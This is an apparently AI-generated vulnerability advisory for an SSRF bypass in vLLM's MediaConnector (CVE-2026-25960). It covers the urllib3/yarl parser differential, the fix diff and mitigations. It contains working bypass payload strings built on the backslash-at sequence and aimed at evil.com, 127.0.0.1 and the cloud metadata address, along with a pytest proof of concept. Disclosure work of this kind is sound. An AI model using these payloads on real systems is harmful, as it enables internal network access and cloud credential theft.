CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.


© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-25960
7.1

CVE-2026-25960: Server-Side Request Forgery (SSRF) Bypass in vLLM MediaConnector via Parser Differential

Amit Schendel
Senior Security Researcher

Mar 9, 2026 · 5 min read

PoC Available

Executive Summary (TL;DR)

A URL parser differential between the validation layer and the HTTP client in vLLM allows attackers to bypass SSRF restrictions using the '\@' character sequence, granting unauthorized read access to internal network resources.

vLLM contains a high-severity parser differential vulnerability that allows attackers to bypass existing Server-Side Request Forgery (SSRF) protections. By exploiting parsing discrepancies between urllib3 and yarl, attackers can craft specific URLs that pass validation but direct the underlying HTTP client to query internal network services and cloud metadata endpoints.

Vulnerability Overview

vLLM is a high-throughput and memory-efficient inference and serving engine for Large Language Models. To support multimodal model inference, the engine includes a MediaConnector component responsible for fetching external media resources, such as images, from user-provided URLs.

CVE-2026-25960 represents a Server-Side Request Forgery (SSRF) bypass within this specific component. The vulnerability undermines the domain allowlist protections previously introduced in version 0.15.1 to resolve CVE-2026-24779. It exposes the underlying infrastructure to reconnaissance and data exfiltration attacks.

The flaw originates from a parser differential between the validation library (urllib3) and the network execution library (aiohttp utilizing yarl). Because these two libraries interpret malformed URL strings differently, an attacker can construct a payload that the validator categorizes as benign, but the execution layer interprets as a target on the internal network.

Root Cause Analysis

The core issue is a parser differential triggered by the inclusion of a backslash (\) immediately preceding an at-symbol (@) within the authority component of a URL. The vLLM application relies on urllib3.util.parse_url() to extract the hostname and validate it against a configured allowlist, but employs aiohttp to perform the actual network request.

When the urllib3 parser processes a sequence such as http://trusted.com\@evil.com, it interprets the backslash as a path separator or an invalid character that terminates the authority section. Consequently, it parses the hostname strictly as trusted.com. If trusted.com resides on the allowed domains list, the validation routine permits the request to proceed.

Conversely, the yarl library, which provides URL parsing for aiohttp, adheres to a different interpretation of RFC 3986. It processes the backslash and the preceding trusted.com string as part of the userinfo subcomponent (user credentials). The @ symbol delineates the end of the userinfo block, causing yarl to extract evil.com as the actual destination hostname.
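The divergence can be illustrated with a self-contained sketch. The validator model below is hypothetical (a simplified stand-in for urllib3's behavior of ending the authority at a backslash), while the client view uses the standard library's urlsplit, which, like yarl, treats everything before the '@' as userinfo:

```python
import re
from urllib.parse import urlsplit


def validator_view(url: str) -> str:
    """Simplified model of the urllib3-style validator: the backslash
    terminates the authority section, so the host ends at the first
    of the characters \\ / ? #."""
    authority = url.split("//", 1)[1]
    return re.split(r"[\\/?#]", authority, maxsplit=1)[0]


def client_view(url: str) -> str:
    """The stdlib parser, like yarl, treats everything before the '@'
    in the authority as userinfo; the real host follows it."""
    return urlsplit(url).hostname


# Literal payload: http://trusted.com\@evil.com/steal
payload = "http://trusted.com\\@evil.com/steal"

print(validator_view(payload))  # trusted.com (passes the allowlist)
print(client_view(payload))     # evil.com (the host actually contacted)
```

The same input thus yields two different hostnames depending on which parser inspects it, which is the entire attack surface of this class of bug.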

Code Analysis

Prior to version 0.17.0, the load_from_url_async method in vllm/multimodal/media/connector.py accepted a user-supplied URL and passed it through the validation logic. Once validated, the original, un-normalized string was passed directly to the aiohttp connection pool. This separation between validation input and execution input created the exact conditions required for a parser differential exploit.

The official patch addresses this by unifying the input consumed by both the validation and execution routines. The fix alters the async_get_bytes call to utilize the normalized URL object generated by the validation layer.

@@ -177,7 +177,7 @@ async def load_from_url_async(
 
             connection = self.connection
             data = await connection.async_get_bytes(
-                url,
+                url_spec.url,
                 timeout=fetch_timeout,
                 allow_redirects=envs.VLLM_MEDIA_URL_ALLOW_REDIRECTS,
             )

By passing url_spec.url instead of the raw url variable, the HTTP client processes a strictly normalized string where ambiguity has been resolved by urllib3. This ensures the requested destination aligns perfectly with the validated destination, completely eliminating the parser differential.
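The validate-then-reuse pattern the patch applies can be sketched with the standard library. This is an illustration only: vLLM itself uses urllib3 and aiohttp, and both resolve_media_url and ALLOWED_DOMAINS are invented names standing in for the real validation path and allowed_media_domains:

```python
from urllib.parse import urlsplit, urlunsplit

# Hypothetical stand-in for the allowed_media_domains configuration.
ALLOWED_DOMAINS = {"trusted.com"}


def resolve_media_url(raw_url: str) -> str:
    """Validate a URL and return the exact string the HTTP client must use.

    The key property, mirroring the fix: the returned URL is rebuilt from
    the same parsed object the allowlist check inspected, so the validated
    host and the requested host cannot diverge.
    """
    parts = urlsplit(raw_url)
    if parts.hostname not in ALLOWED_DOMAINS:
        raise ValueError(f"domain not allowed: {parts.hostname!r}")
    return urlunsplit(parts)
```

With this shape, a payload such as http://trusted.com\@evil.com/x is rejected outright (the parser sees evil.com), and a clean URL is passed through unchanged.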

Exploitation Methodology

An attacker exploits this vulnerability by submitting a crafted media URL during a multimodal inference request. The objective is to target internal services that lack authentication requirements, such as a local management interface on 127.0.0.1 or the standard cloud provider metadata endpoint at 169.254.169.254.

The payload structure relies on knowing or guessing at least one domain present in the application's allowed_media_domains configuration. If 127.0.0.1 is allowlisted, the attacker constructs a payload formatted as http://127.0.0.1:80\@attacker-controlled.com/resource to pivot to an external host; conversely, if a public domain is allowlisted, the same structure redirects the request to internal targets such as the metadata endpoint.

The following proof-of-concept snippet demonstrates the logic flow. The application validates the string against the allowlist, while the underlying client executes the request against the secondary domain defined in the payload.

import pytest

from vllm.multimodal.media.connector import MediaConnector


@pytest.mark.asyncio
async def test_ssrf_bypass_demo():
    # The escaped backslash yields the literal URL
    # http://127.0.0.1:80\@evil.com/malicious_payload
    bypass_url = "http://127.0.0.1:80\\@evil.com/malicious_payload"
    connector = MediaConnector(allowed_media_domains=["127.0.0.1"])

    # On vulnerable versions, validation sees 127.0.0.1 (allowed) while
    # the HTTP client resolves and contacts evil.com instead.
    try:
        await connector.fetch_image_async(bypass_url)
    except Exception as e:
        print(f"Bypass failed as expected: {e}")

Impact Assessment

The vulnerability carries a CVSS v3.1 score of 7.1, reflecting a High confidentiality impact. Exploitation grants an attacker read access to internal HTTP endpoints reachable from the vLLM deployment environment. This access directly compromises data confidentiality and exposes internal network topologies.

The most critical risk involves the exfiltration of cloud IAM credentials. Many cloud environments host metadata services at standard non-routable IP addresses. By routing requests to these endpoints, attackers extract temporary security credentials, enabling lateral movement and potential control over the broader cloud infrastructure.

Integrity impact is rated as None, as the vulnerable code path only issues HTTP GET requests and offers no ability to modify internal server state. Availability impact is Low, reflecting the possibility that an attacker routing high volumes of requests to fragile internal services may induce localized denial-of-service conditions.

Mitigation and Remediation

The primary remediation strategy requires upgrading the vLLM deployment to version 0.17.0 or later. This release incorporates commit 6f3b2047abd4a748e3db4a68543f8221358002c0, which correctly normalizes the URL before network execution. Administrators should verify the version in their container registries and deployment pipelines.

For environments unable to immediately deploy the patch, network-level egress filtering provides effective defense-in-depth. Deployments should operate in restricted network namespaces or utilize strict firewall rules that block outbound access to local subnets and the 169.254.169.254 cloud metadata address space.

Security operators should implement Web Application Firewall (WAF) signatures or input validation filters at the ingress layer. Rejecting HTTP requests containing the \@ sequence in URI parameters or JSON payloads prevents the malformed input from reaching the vulnerable parsing logic.
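A minimal ingress filter along these lines can be sketched as follows (an illustrative sketch, not a production WAF rule; the function name and pattern are assumptions, not part of any vendor product):

```python
import re

# Reject a literal backslash immediately preceding '@' anywhere in the
# input, the signature of this parser-confusion payload.
CONFUSION_PATTERN = re.compile(r"\\@")


def contains_parser_confusion(raw: str) -> bool:
    """Return True if a URI parameter or payload carries the \\@ sequence."""
    return CONFUSION_PATTERN.search(raw) is not None
```

Such a filter would flag http://127.0.0.1:80\@evil.com/x while letting ordinary media URLs through; it blunts this specific payload shape but is no substitute for the upgrade.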

Official Patches

  • vLLM Project: Official Security Advisory
  • vLLM Project: Fix Pull Request


Technical Appendix

CVSS Score
7.1 / 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L

Affected Systems

vLLM versions >= 0.15.1, < 0.17.0

Affected Versions Detail

Product: vLLM (vLLM Project)
Affected Versions: >= 0.15.1, < 0.17.0
Fixed Version: 0.17.0
CWE ID: CWE-918
Attack Vector: Network
CVSS Score: 7.1 (High)
Impact: High Confidentiality, Low Availability
Exploit Status: Proof of Concept Available
Root Cause: Parser Differential (urllib3 vs yarl)

MITRE ATT&CK Mapping

T1190: Exploit Public-Facing Application (Initial Access)
T1005: Data from Local System (Collection)

CWE-918: Server-Side Request Forgery (SSRF)

Server-Side Request Forgery (SSRF) via URL Parser Differential

Known Exploits & Detection

vLLM Security Test Cases: Proof-of-concept code demonstrating the bypass logic within the project's own test suite.

Vulnerability Timeline

2026-02-18: Official fix committed to the vLLM repository.
2026-03-09: Vulnerability publicly disclosed and GHSA published.
2026-03-09: CVE-2026-25960 officially assigned.

References & Sources

  • [1] GHSA-v359-jj2v-j536: SSRF Bypass in vLLM
  • [2] Pull Request 34743: Fix SSRF Bypass
  • [3] Fix Commit 6f3b204
  • [4] Related Advisory GHSA-qh4c-xf7m-gxfc (Initial Fix)

Attack Flow Diagram
